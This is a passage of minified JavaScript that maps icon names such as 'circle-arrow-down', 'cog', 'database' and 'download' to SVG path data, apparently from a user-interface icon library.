3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],circle:["M8 0C3.6 0 0 3.6 0 8s3.6 8 8 8 8-3.6 8-8-3.6-8-8-8zm0 14c-3.3 0-6-2.7-6-6s2.7-6 6-6 6 2.7 6 6-2.7 6-6 6z"],"circle-arrow-down":["M11 7c-.28 0-.53.11-.71.29L9 8.59V5c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-1.29-1.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 11 7zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6z"],"circle-arrow-left":["M11 7H7.41L8.7 5.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3C4.11 7.47 4 7.72 4 8c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L7.41 9H11c.55 0 1-.45 1-1s-.45-1-1-1zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6z"],"circle-arrow-right":["M8.71 4.29a1.003 1.003 0 0 0-1.42 1.42L8.59 7H5c-.55 0-1 .45-1 1s.45 1 1 1h3.59L7.3 10.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6z"],"circle-arrow-up":["M8.71 4.29C8.53 4.11 8.28 4 8 4s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L7 7.41V11c0 .55.45 1 1 1s1-.45 1-1V7.41l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6z"],citation:["M15.02 5c0-1.66-1.34-3-3-3s-3 1.34-3 3a2.996 2.996 0 0 0 3.6 2.94C12.1 9.76 11.14 11 10.02 11c-.55 0-1 .45-1 1s.45 1 1 1c2.76 0 5-3.13 5-7 0-.2-.02-.39-.04-.58.01-.14.04-.28.04-.42zm-11-3c-1.66 0-3 1.34-3 3a2.996 2.996 0 0 0 3.6 2.94C4.1 9.76 3.14 11 2.02 11c-.55 0-1 .45-1 1s.45 1 1 1c2.76 0 5-3.13 5-7 0-.2-.02-.39-.04-.58.01-.14.04-.28.04-.42 0-1.66-1.35-3-3-3z"],clean:["M12 8l-1.2 2.796-2.8 1.2 2.8 1.197L12 16l1.2-2.807L16 12l-2.8-1.204zM5 0L3.5 3.5 0 4.995 3.5 6.5 5 10l1.5-3.5L10 5 6.5 3.5z"],clipboard:["M11 2c0-.55-.45-1-1-1h.22C9.88.4 9.24 0 8.5 0S7.12.4 6.78 1H7c-.55 0-1 .45-1 1v1h5V2zm2 0h-1v2H5V2H4c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],cloud:["M12 6c-.03 0-.07 0-.1.01A5 5 0 0 0 2 7c0 .11.01.22.02.33A3.51 3.51 0 0 0 0 10.5C0 12.43 1.57 14 3.5 14H12c2.21 0 4-1.79 4-4s-1.79-4-4-4z"],"cloud-download":["M11 11c-.28 0-.53.11-.71.29L9 12.59V8c0-.55-.45-1-1-1s-1 .45-1 1v4.59L5.71 11.3A.965.965 0 0 0 5 11a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 11 11zm1-7c-.03 0-.07 0-.1.01A5 5 0 0 0 2 5c0 .11.01.22.02.33A3.51 3.51 0 0 0 0 8.5c0 1.41.84 2.61 2.03 3.17C2.2 10.17 3.46 9 5 9c.06 0 .13.02.19.02C5.07 8.7 5 8.36 5 8c0-1.66 1.34-3 3-3s3 1.34 3 3c0 .36-.07.7-.19 1.02.06 0 .13-.02.19-.02 1.48 0 2.7 1.07 2.95 2.47A3.964 3.964 0 0 0 16 8c0-2.21-1.79-4-4-4z"],"cloud-upload":["M8.71 7.29C8.53 7.11 8.28 7 8 7s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L7 10.41V15c0 .55.45 1 1 1s1-.45 1-1v-4.59l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3zM12 4c-.03 0-.07 0-.1.01A5 5 0 0 0 2 5c0 .11.01.22.02.33a3.495 3.495 0 0 0 .07 6.37c-.05-.23-.09-.46-.09-.7 0-.83.34-1.58.88-2.12l3-3a2.993 2.993 0 0 1 4.24 0l3 3c.54.54.88 1.29.88 2.12 0 .16-.02.32-.05.47C15.17 10.78 16 9.5 16 8c0-2.21-1.79-4-4-4z"],code:["M15.71 7.29l-3-3a1.003 1.003 0 0 0-1.42 1.42L13.59 8l-2.29 2.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM5 5a1.003 1.003 0 0 0-1.71-.71l-3 3C.11 7.47 0 7.72 0 8c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L2.41 8 4.7 5.71c.19-.18.3-.43.3-.71zm4-3c-.48 0-.87.35-.96.81l-2 10c-.01.06-.04.12-.04.19 0 .55.45 1 1 1 .48 0 .87-.35.96-.81l2-10c.01-.06.04-.12.04-.19 0-.55-.45-1-1-1z"],"code-block":["M15 3h-2V2c0-.55-.45-1-1-1h-2c-.55 0-1 .45-1 1v1H7V2c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v1H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zm-8.29 8.29a1.003 1.003 0 0 1-1.42 1.42l-3-3C2.11 9.53 2 9.28 2 9s.11-.53.29-.71l3-3a1.003 1.003 0 0 1 1.42 1.42L4.41 9l2.3 2.29zm7-1.58l-3 3a1.003 1.003 0 0 1-1.42-1.42L11.59 9l-2.3-2.29a1.003 1.003 0 0 1 1.42-1.42l3 3c.18.18.29.43.29.71s-.11.53-.29.71z"],cog:["M15.19 6.39h-1.85c-.11-.37-.27-.71-.45-1.04l1.36-1.36c.31-.31.31-.82 0-1.13l-1.13-1.13a.803.803 0 0 0-1.13 0l-1.36 1.36c-.33-.17-.67-.33-1.04-.44V.79c0-.44-.36-.8-.8-.8h-1.6c-.44 0-.8.36-.8.8v1.86c-.39.12-.75.28-1.1.47l-1.3-1.3c-.3-.3-.79-.3-1.09 0L1.82 2.91c-.3.3-.3.79 0 1.09l1.3 1.3c-.2.34-.36.7-.48 1.09H.79c-.44 0-.8.36-.8.8v1.6c0 .44.36.8.8.8h1.85c.11.37.27.71.45 1.04l-1.36 1.36c-.31.31-.31.82 0 1.13l1.13 1.13c.31.31.82.31 1.13 0l1.36-1.36c.33.18.67.33 1.04.44v1.86c0 .44.36.8.8.8h1.6c.44 0 .8-.36.8-.8v-1.86c.39-.12.75-.28 1.1-.47l1.3 1.3c.3.3.79.3 1.09 0l1.09-1.09c.3-.3.3-.79 0-1.09l-1.3-1.3c.19-.35.36-.71.48-1.1h1.85c.44 0 .8-.36.8-.8v-1.6a.816.816 0 0 0-.81-.79zm-7.2 4.6c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z"],"collapse-all":["M7.29 6.71c.18.18.43.29.71.29s.53-.11.71-.29l4-4a1.003 1.003 0 0 0-1.42-1.42L8 4.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4zm1.42 2.58C8.53 9.11 8.28 9 8 9s-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L8 11.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4z"],"column-layout":["M15 1H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM4 13H2V3h2v10zm3 0H5V3h2v10zm7 0H8V3h6v10z"],comment:["M14 1H1c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1h2v3a1.003 1.003 0 0 0 1.71.71L8.41 12H14c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM3.5 8C2.67 8 2 7.33 2 6.5S2.67 5 3.5 5 5 5.67 5 6.5 4.33 8 3.5 8zm4 0C6.67 8 6 7.33 6 6.5S6.67 5 7.5 5 9 5.67 9 6.5 8.33 8 7.5 8zm4 0c-.83 0-1.5-.67-1.5-1.5S10.67 5 11.5 5s1.5.67 1.5 1.5S12.33 8 11.5 8z"],comparison:["M7.99-.01c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1v-14c0-.55-.45-1-1-1zm-3 3h-4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zm10 0h-4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zm0 3h-4v-2h4v2zm0 3h-4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zm0 3h-4v-2h4v2zm-10-3h-4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1z"],compass:["M12 8c0 .14-.03.27-.08.39l-3 6.99c-.15.37-.51.62-.92.62s-.77-.25-.92-.61l-3-6.99a1.006 1.006 0 0 1 0-.79l3-6.99C7.23.25 7.59 0 8 0s.77.25.92.61l3 6.99c.05.13.08.26.08.4zM8 3.54L6.09 8h3.82L8 3.54z"],compressed:["M15.93 5.63v-.02L13.94.63C13.78.26 13.42 0 13 0H3c-.42 0-.78.26-.93.63L.08 5.61l-.01.02C.03 5.74 0 5.87 0 6v9c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V6c0-.13-.03-.26-.07-.37zM9 2h3.32l1.2 3H9V2zM3.68 2H7v3H2.48l1.2-3zM14 14H2V7h5v2.59l-1.29-1.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3a1.003 1.003 0 0 0-1.42-1.42L9 9.59V7h5v7z"],confirm:["M8.7 4.29a.965.965 0 0 0-.71-.3 1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l5-5a1.003 1.003 0 0 0-1.42-1.42l-4.29 4.3L8.7 4.29zm5.22 3.01c.03.23.07.45.07.69 0 3.31-2.69 6-6 6s-6-2.69-6-6 2.69-6 6-6c.81 0 1.59.17 2.3.46l1.5-1.5A7.998 7.998 0 0 0-.01 7.99c0 4.42 3.58 8 8 8s8-3.58 8-8c0-.83-.13-1.64-.36-2.39l-1.71 1.7z"],console:["M15 15H1c-.55 0-1-.45-1-1V2c0-.55.45-1 1-1h14c.55 0 1 .45 1 1v12c0 .55-.45 1-1 1zM14 5H2v8h12V5zM4 6c.28 0 .53.11.71.29l2 2c.18.18.29.43.29.71s-.11.53-.29.71l-2 2a1.003 1.003 0 0 1-1.42-1.42L4.59 9l-1.3-1.29A1.003 1.003 0 0 1 4 6zm5 4h3c.55 0 1 .45 1 1s-.45 1-1 1H9c-.55 0-1-.45-1-1s.45-1 1-1z"],contrast:["M15.2 6.4h-1.44c-.13-.47-.32-.92-.56-1.34L14.26 4c.31-.31.31-.82 0-1.13l-1.13-1.13a.803.803 0 0 0-1.13 0L10.94 2.8c-.42-.24-.86-.42-1.34-.56V.8c0-.44-.36-.8-.8-.8H7.2c-.44 0-.8.36-.8.8v1.44c-.5.14-.96.34-1.4.59l-1-1c-.3-.3-.79-.3-1.09 0L1.83 2.91c-.3.3-.3.79 0 1.09l1 1c-.25.44-.45.9-.59 1.4H.8c-.44 0-.8.36-.8.8v1.6c0 .44.36.8.8.8h1.44c.13.47.32.92.56 1.34L1.74 12c-.31.31-.31.82 0 1.13l1.13 1.13c.31.31.82.31 1.13 0l1.06-1.06c.42.24.86.42 1.34.56v1.44c0 .44.36.8.8.8h1.6c.44 0 .8-.36.8-.8v-1.44c.5-.14.96-.33 1.4-.59l1 1c.3.3.79.3 1.09 0l1.09-1.09c.3-.3.3-.79 0-1.09l-1-1c.25-.43.45-.9.59-1.4h1.44c.44 0 .8-.36.8-.8V7.2a.818.818 0 0 0-.81-.8zM8 12c-2.21 0-4-1.79-4-4s1.79-4 4-4v8z"],control:["M13 8H8v5h5V8zm0-5H8v4h5V3zm2-3H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2V2h12v12zM7 3H3v10h4V3z"],"credit-card":["M14.99 2.95h-14c-.55 0-1 .45-1 1v1h16v-1c0-.55-.45-1-1-1zm-15 10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-6h-16v6zm5.5-2h5c.28 0 .5.22.5.5s-.22.5-.5.5h-5c-.28 0-.5-.22-.5-.5s.23-.5.5-.5zm-3 0h1c.28 0 .5.22.5.5s-.22.5-.5.5h-1c-.28 0-.5-.22-.5-.5s.23-.5.5-.5z"],cross:["M9.41 8l3.29-3.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L8 6.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42L6.59 8 3.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L8 9.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L9.41 8z"],crown:["M2 6l3 2 3-4 3 4 3-2-1 6H3L2 6zm6-5a1 1 0 1 1 0 2 1 1 0 0 1 0-2zM1 3a1 1 0 1 1 0 2 1 1 0 0 1 0-2zm14 0a1 1 0 1 1 0 2 1 1 0 0 1 0-2zM3 13h10v2H3v-2z"],cube:["M14.194 3.54L8 7.41 1.806 3.54 7.504.283a1 1 0 0 1 .992 0l5.698 3.255zm.75.71a1 1 0 0 1 .056.33v6.84a1 1 0 0 1-.504.868L8.5 15.714V8.277l6.444-4.027zm-13.888 0L7.5 8.277v7.437l-5.996-3.426A1 1 0 0 1 1 11.42V4.58a1 1 0 0 1 .056-.33z"],"cube-add":["M14 2h1a1 1 0 0 1 0 2h-1v1a1 1 0 0 1-2 0V4h-1a1 1 0 0 1 0-2h1V1a1 1 0 0 1 2 0v1zM9.136.65a3.001 3.001 0 0 0 .992 5.222c.018.058.038.115.059.172L8 7.41 1.806 3.54 7.504.283a1 1 0 0 1 .992 0l.64.365zM15 7.235v4.184a1 1 0 0 1-.504.868L8.5 15.714V8.277l2.187-1.367A2.994 2.994 0 0 0 13 8c.768 0 1.47-.289 2-.764zM1.056 4.25L7.5 8.277v7.437l-5.996-3.426A1 1 0 0 1 1 11.42V4.58a1 1 0 0 1 .056-.33z"],"cube-remove":["M10.365 5.933L8 7.41 1.806 3.54 7.504.283a1 1 0 0 1 .992 0l.64.365a3.001 3.001 0 0 0 1.228 5.283zM15 6v5.42a1 1 0 0 1-.504.868L8.5 15.714V8.277L12.143 6H15zM1.056 4.25L7.5 8.277v7.437l-5.996-3.426A1 1 0 0 1 1 11.42V4.58a1 1 0 0 1 .056-.33zM11 2h4a1 1 0 0 1 0 2h-4a1 1 0 0 1 0-2z"],"curved-range-chart":["M15 12H3.12l1.81-1.39c1.73 1.01 5.53-.03 9.08-2.61l-1.22-1.5C10.3 8.3 7.86 9.37 6.65 9.29L14.3 3.4l-.6-.8-7.83 6.03c-.01-1.07 1.8-3.19 4.47-5.13L9.12 2C5.38 4.7 3.34 8.1 4.25 9.87L2 11.6V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],cut:["M13 2s.71-1.29 0-2L8.66 5.07l1.05 1.32L13 2zm.07 8c-.42 0-.82.09-1.18.26L3.31 0c-.69.71 0 2 0 2l3.68 5.02-2.77 3.24A2.996 2.996 0 0 0 0 13c0 1.66 1.34 3 3 3s3-1.34 3-3c0-.46-.11-.89-.29-1.27L8.1 8.54l2.33 3.19c-.18.39-.29.82-.29 1.27 0 1.66 1.31 3 2.93 3S16 14.66 16 13s-1.31-3-2.93-3zM3 14c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm10.07 0c-.54 0-.98-.45-.98-1s.44-1 .98-1 .98.45.98 1-.44 1-.98 1z"],dashboard:["M5 4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zM4 7c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm4-2c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zm-2 6c0 1.1.9 2 2 2s2-.9 2-2c0-.53-2-5-2-5s-2 4.47-2 5zM8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6zm4-9c0-.55-.45-1-1-1s-1 .45-1 1 .45 1 1 1 1-.45 1-1zm0 2c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1z"],database:["M8 4c3.31 0 6-.9 6-2s-2.69-2-6-2C4.68 0 2 .9 2 2s2.68 2 6 2zm-6-.48V8c0 1.1 2.69 2 6 2s6-.9 6-2V3.52C12.78 4.4 10.56 5 8 5s-4.78-.6-6-1.48zm0 6V14c0 1.1 2.69 2 6 2s6-.9 6-2V9.52C12.78 10.4 10.56 11 8 11s-4.78-.6-6-1.48z"],delete:["M11.99 4.99a1.003 1.003 0 0 0-1.71-.71l-2.29 2.3L5.7 4.29a.965.965 0 0 0-.71-.3 1.003 1.003 0 0 0-.71 1.71l2.29 2.29-2.29 2.29A1.003 1.003 0 0 0 5.7 11.7l2.29-2.29 2.29 2.29a1.003 1.003 0 0 0 1.42-1.42L9.41 7.99 11.7 5.7c.18-.18.29-.43.29-.71zm-4-5c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.68 6-6 6z"],delta:["M8 0L0 16h16L8 0zM7 5l5 10H2L7 5z"],"derive-column":["M6.08 6.67h-.84c.24-.92.56-1.6.96-2.03.24-.27.48-.4.71-.4.05 0 .08.01.11.04s.04.06.04.1c0 .04-.03.11-.1.21-.06.1-.1.2-.1.29 0 .13.05.24.15.33.1.09.23.14.39.14.17 0 .31-.06.42-.17A.58.58 0 0 0 8 4.73c0-.22-.09-.39-.26-.53-.17-.13-.44-.2-.81-.2-.59 0-1.12.16-1.59.48-.48.32-.93.85-1.36 1.59-.15.26-.29.42-.42.49s-.35.11-.64.1l-.19.65h.81l-1.19 4.37c-.2.72-.33 1.16-.4 1.33-.1.24-.26.45-.46.62-.08.07-.18.1-.3.1-.03 0-.06-.01-.08-.03l-.03-.04c0-.02.03-.06.09-.11.06-.06.09-.14.09-.26 0-.13-.05-.23-.14-.32a.6.6 0 0 0-.4-.13c-.21 0-.38.05-.51.16s-.21.25-.21.4c0 .16.08.3.23.42.16.12.4.18.74.18.53 0 .99-.13 1.4-.39.41-.26.76-.65 1.07-1.19.3-.54.62-1.4.94-2.59l.68-2.53h.82l.2-.63zM15 0H8c-.55 0-1 .45-1 1v2h2V2h5v12H9v-1H7v2c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM8.3 9.94c.18.52.33.89.46 1.13.13.24.28.4.44.51.17.1.37.16.62.16.24 0 .49-.08.74-.25.33-.21.66-.58 1.01-1.09l-.21-.11c-.23.31-.41.5-.52.57a.44.44 0 0 1-.26.07c-.12 0-.24-.07-.36-.21-.2-.24-.46-.91-.8-2 .3-.49.55-.81.75-.96.15-.11.3-.16.47-.16.06 0 .17.02.34.06.16.04.31.06.43.06.17 0 .31-.06.43-.17.1-.11.16-.25.16-.43 0-.19-.06-.33-.17-.44-.12-.11-.28-.16-.49-.16-.19 0-.37.04-.54.13-.17.09-.39.27-.65.56-.2.21-.48.58-.87 1.11-.15-.66-.41-1.26-.78-1.81l-2.05.33-.04.21c.15-.03.28-.04.39-.04.2 0 .37.08.5.25.21.26.5 1.03.88 2.33-.29.37-.49.61-.6.72-.18.18-.33.3-.44.36-.09.04-.19.07-.3.07-.09 0-.23-.04-.42-.13a.866.866 0 0 0-.36-.09c-.2 0-.36.06-.49.18a.59.59 0 0 0-.19.46c0 .17.06.32.18.43.12.11.28.16.48.16.2 0 .38-.04.55-.11.17-.08.39-.24.65-.49.24-.27.6-.66 1.06-1.21z"],desktop:["M15 0H1C.45 0 0 .45 0 1v10c0 .55.45 1 1 1h4.75l-.5 2H4c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1h-1.25l-.5-2H15c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 10H2V2h12v8z"],"diagram-tree":["M15 8v3h-2V9H9v2H7V9H3v2H1V8a1 1 0 0 1 1-1h5V5h2v2h5a1 1 0 0 1 1 1zM1 12h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zm12 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zm-6 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H7a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zM7 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H7a1 1 0 0 1-1-1V1a1 1 0 0 1 1-1z"],"direction-left":["M16 1.99l-16 6 16 6-4-6z"],"direction-right":["M16 7.99l-16-6 4 6-4 6z"],disable:["M7.99-.01c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm-6 8c0-3.31 2.69-6 6-6 1.3 0 2.49.42 3.47 1.12l-8.35 8.35c-.7-.98-1.12-2.17-1.12-3.47zm6 6c-1.3 0-2.49-.42-3.47-1.12l8.35-8.35c.7.98 1.12 2.17 1.12 3.47 0 3.32-2.68 6-6 6z"],document:["M9 0H3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V5L9 0zm3 14H4V2h4v4h4v8z"],"document-open":["M6 12c0 .55.45 1 1 1s1-.45 1-1V8c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1s.45 1 1 1h1.59L1.3 12.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L6 10.41V12zm4-12H4c-.55 0-1 .45-1 1v4h2V2h4v4h4v8H5.24l-1.8 1.8c.16.12.35.2.56.2h10c.55 0 1-.45 1-1V5l-5-5z"],"document-share":["M10 14H2V2h4v4h1c0-.83.36-1.55.91-2.09l-.03-.03.9-.9C8.3 2.45 8 1.77 8 1L7 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V8.22c-.53.48-1.23.78-2 .78v5zm5-14h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59l-3.3 3.29a1.003 1.003 0 0 0 1.42 1.42L14 3.41V5c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],dollar:["M12.83 9.51c-.1-.3-.25-.58-.45-.84s-.45-.49-.75-.7c-.3-.2-.65-.36-1.05-.48-.16-.04-.43-.11-.8-.2-.35-.09-.73-.18-1.12-.28-.39-.1-.74-.19-1.06-.27-.31-.08-.49-.12-.54-.13-.43-.12-.78-.29-1.05-.52-.27-.23-.4-.55-.4-.95 0-.29.07-.53.21-.72.14-.19.32-.34.54-.46.22-.11.46-.19.72-.24.26-.05.52-.08.77-.08.74 0 1.35.15 1.83.46.48.3.75.83.81 1.56h2.14c0-.6-.13-1.13-.38-1.58-.25-.45-.59-.84-1.02-1.15-.43-.31-.93-.54-1.49-.7-.24-.06-.49-.1-.75-.14V1c0-.55-.45-1-1-1s-1 .45-1 1v1.08c-.23.03-.46.07-.68.13-.54.13-1.02.34-1.44.61-.42.28-.76.63-1.02 1.05-.26.43-.39.93-.39 1.5 0 .3.04.59.13.88.09.29.23.56.44.82.21.26.48.49.83.7.35.21.79.38 1.31.51.85.21 1.56.38 2.14.52.58.13 1.08.28 1.52.42.25.09.48.23.69.44.21.21.32.53.32.97 0 .21-.05.42-.14.63-.09.21-.24.39-.45.55-.21.16-.47.29-.81.39-.33.1-.73.15-1.2.15-.43 0-.84-.05-1.21-.14-.37-.09-.7-.24-.99-.43-.29-.2-.51-.45-.67-.76-.16-.31-.24-.68-.24-1.12H3c.01.71.15 1.32.43 1.84.27.52.64.94 1.1 1.27.46.33.99.58 1.61.74.27.07.56.12.85.16V15c0 .55.45 1 1 1s1-.45 1-1v-1.05c.3-.03.61-.08.9-.15.58-.13 1.1-.34 1.56-.63.46-.29.83-.66 1.11-1.11.28-.45.42-1 .42-1.64 0-.31-.05-.61-.15-.91z"],dot:["M8 5a3 3 0 1 0 0 6 3 3 0 1 0 0-6z"],"double-caret-horizontal":["M13.71 7.29l-3-3A1.003 1.003 0 0 0 9 5v6a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM6 4c-.28 0-.53.11-.71.29l-3 3C2.11 7.47 2 7.72 2 8c0 .28.11.53.29.71l3 3A1.003 1.003 0 0 0 7 11V5c0-.55-.45-1-1-1z"],"double-caret-vertical":["M5 7h6a1.003 1.003 0 0 0 .71-1.71l-3-3C8.53 2.11 8.28 2 8 2s-.53.11-.71.29l-3 3A1.003 1.003 0 0 0 5 7zm6 2H5a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 11 9z"],"double-chevron-down":["M7.29 8.71c.18.18.43.29.71.29s.53-.11.71-.29l4-4a1.003 1.003 0 0 0-1.42-1.42L8 6.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4zM12 8c-.28 0-.53.11-.71.29L8 11.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4c.18.18.43.29.71.29s.53-.11.71-.29l4-4A1.003 1.003 0 0 0 12 8z"],"double-chevron-left":["M4.41 8L7.7 4.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4C2.11 7.47 2 7.72 2 8c0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L4.41 8zm5 0l3.29-3.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4C7.11 7.47 7 7.72 7 8c0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L9.41 8z"],"double-chevron-right":["M9 8c0-.28-.11-.53-.29-.71l-4-4a1.003 1.003 0 0 0-1.42 1.42L6.59 8 3.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4C8.89 8.53 9 8.28 9 8zm4.71-.71l-4-4a1.003 1.003 0 0 0-1.42 1.42L11.59 8 8.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"double-chevron-up":["M4 8c.28 0 .53-.11.71-.29L8 4.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4C8.53 2.11 8.28 2 8 2s-.53.11-.71.29l-4 4A1.003 1.003 0 0 0 4 8zm4.71-.71C8.53 7.11 8.28 7 8 7s-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L8 9.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4z"],"doughnut-chart":["M11.86 7h4.05C15.45 3.39 12.61.52 9 .07v4.07A4 4 0 0 1 11.86 7zM12 8c0 2.21-1.79 4-4 4s-4-1.79-4-4 1.79-4 4-4V0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8h-4z"],download:["M7.99-.01c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zM11.7 9.7l-3 3c-.18.18-.43.29-.71.29s-.53-.11-.71-.29l-3-3A1.003 1.003 0 0 1 5.7 8.28l1.29 1.29V3.99c0-.55.45-1 1-1s1 .45 1 1v5.59l1.29-1.29a1.003 1.003 0 0 1 1.71.71c0 .27-.11.52-.29.7z"],"drag-handle-horizontal":["M2 9c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0-4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm4 4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm8-2c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zm0 2c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm-4-4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0 4c-.55 0-1 